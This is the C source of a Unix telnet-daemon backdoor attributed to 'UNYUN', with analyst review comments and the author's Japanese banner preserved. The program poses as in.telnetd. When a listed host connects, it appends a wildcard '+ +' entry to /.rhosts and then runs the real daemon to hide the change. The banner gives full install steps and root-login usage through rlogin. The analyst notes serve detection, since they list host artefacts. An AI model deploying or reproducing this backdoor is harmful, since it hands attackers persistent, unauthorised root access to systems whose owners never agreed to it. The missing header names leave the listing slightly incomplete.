/*
 * NOTE(review): analyst summary of this listing.
 *
 * This is a wrapper meant to sit at the telnet daemon's path. On every
 * incoming connection it resolves the peer's host name, compares it with
 * the roothosts list, and on a match appends the line "+ +" to /.rhosts.
 * In every case where the peer address could be read it then execs the
 * renamed original daemon (ORIGINAL) with the same argv, so the telnet
 * service keeps answering as before.
 *
 * Host artefacts that follow directly from the code and the author's banner:
 *   - /usr/sbin/in.telnetd is not the vendor binary (fails a package or
 *     checksum verification);
 *   - a copy of the real telnet daemon exists under the ORIGINAL path,
 *     /usr/sbin/sysmon by default;
 *   - /.rhosts contains one or more "+ +" lines. The file is opened in
 *     append mode and never cleaned up, so the entry stays after the
 *     triggering connection ends. In .rhosts syntax "+ +" is a wildcard
 *     for any host and any remote user.
 * The banner's usage step relies on rlogin honouring that file.
 *
 * English rendering of the author's banner, which is kept verbatim below:
 *   Remote Backdoor, programmed by UNYUN.
 *   [Installation] 1) enter the host names allowed to create the backdoor
 *   at marker 1; 2) become root; 3) mv /usr/sbin/in.telnetd
 *   /usr/sbin/sysmon (the name sysmon can be changed at marker 2);
 *   4) cc in.telnetd.c -o in.telnetd; 5) mv in.telnetd /usr/sbin.
 *   [Usage] 1) connect to the target with telnet and disconnect before
 *   logging in; 2) log in as root with rlogin target.co.jp -l root.
 */
/*========================================================= Remote Backdoor Programmed by UNYUN
[仕込み方]
1) /*1*/にBackdoor作成許可ホスト名を入力
2) rootになる
3) mv /usr/sbin/in.telnetd /usr/sbin/sysmon (sysmonは/*2*/で変更可)
4) cc in.telnetd.c -o in.telnetd
5) mv in.telnetd /usr/sbin
[使い方]
1) Targetにtelnetで繋ぐ.繋がったらログイン前に切る
2) rlogin target.co.jp -l root でrootログインする
========================================================= */

/* The header names after each #include were lost when the page was
   extracted; the seven directives are kept exactly as found. */
#include
#include
#include
#include
#include
#include
#include

/* Marker 1: host names whose connections trigger the /.rhosts write.
   The empty string is the end-of-list sentinel the matching loop stops on. */
static char *roothosts[]={"yoursite.ne.jp", /* 1 */
                          "fumidai.ac.jp",
                          ""};

/* Marker 2: path the real telnet daemon was moved to; main() execs it. */
#define ORIGINAL "/usr/sbin/sysmon" /* 2 */
/* Descriptor number queried for the peer address. Presumably the client
   socket as handed over by an inetd-style launcher - confirm. */
#define RQ_DAEMON 2
/* Defined but not referenced anywhere in this listing. */
#define BUFFER_SIZE 512
/* File that receives the "+ +" entry. Presumably root's home directory is /
   on the intended targets - confirm. */
#define RHOSTS "/.rhosts"

/*
 * Entry point, started in place of the telnet daemon.
 * argv is passed unchanged to the original daemon; argc is not used.
 * ClientDomain is declared but not used in this listing.
 */
main(int argc,char *argv[])
{
    struct sockaddr_in client;
    struct in_addr clientIn;
    struct hostent *h;
    char buf[BUFSIZ],ClientDomain[200];
    int len,i,flag;
    long inetip;
    FILE *fp;

    /* Obtain the peer address of the connection on descriptor RQ_DAEMON. */
    len = sizeof(client);
    if (getpeername(RQ_DAEMON, (struct sockaddr *)&client, &len) < 0) {
        /* Fallback: peek at pending data (MSG_PEEK leaves it queued) to
           read the sender address instead. */
        len = sizeof(client);
        if (recvfrom(RQ_DAEMON,buf,sizeof(buf),MSG_PEEK,
                     (struct sockaddr *) & client, &len) < 0) {
            /* No peer address available: exit without starting the
               original daemon. */
            return;
        }
    }

    /* Copy the 4-byte IPv4 address, round-trip it through its dotted
       string form, then do a reverse lookup to get the peer's host name. */
    memcpy(&clientIn,&client.sin_addr.s_addr,4);
    inetip=inet_addr(inet_ntoa(clientIn));
    h=(struct hostent *)gethostbyaddr(&inetip,sizeof(struct hostent),AF_INET);

    if (h!=NULL){
        /* Compare the resolved name with each list entry. This is a
           substring test in either direction, not an exact comparison,
           and it trusts whatever name the reverse lookup returned. */
        for (flag=0,i=0;i<10;i++){
            if (strlen(roothosts[i])==0) break;
            if (strstr(roothosts[i],h->h_name)!=NULL ||
                strstr(h->h_name,roothosts[i])!=NULL){
                flag=1;
                break;
            }
        }
        if (flag==1){
            /* Matching peer: append the wildcard trust entry. A failed
               fopen is ignored silently. */
            if ((fp=fopen(RHOSTS,"a"))!=NULL){
                fprintf(fp,"+ +\n");
                fclose(fp);
            }
        }
    }

    /* Hand the connection to the real daemon, so the service shows no
       change to ordinary users. */
    execv(ORIGINAL,argv);
}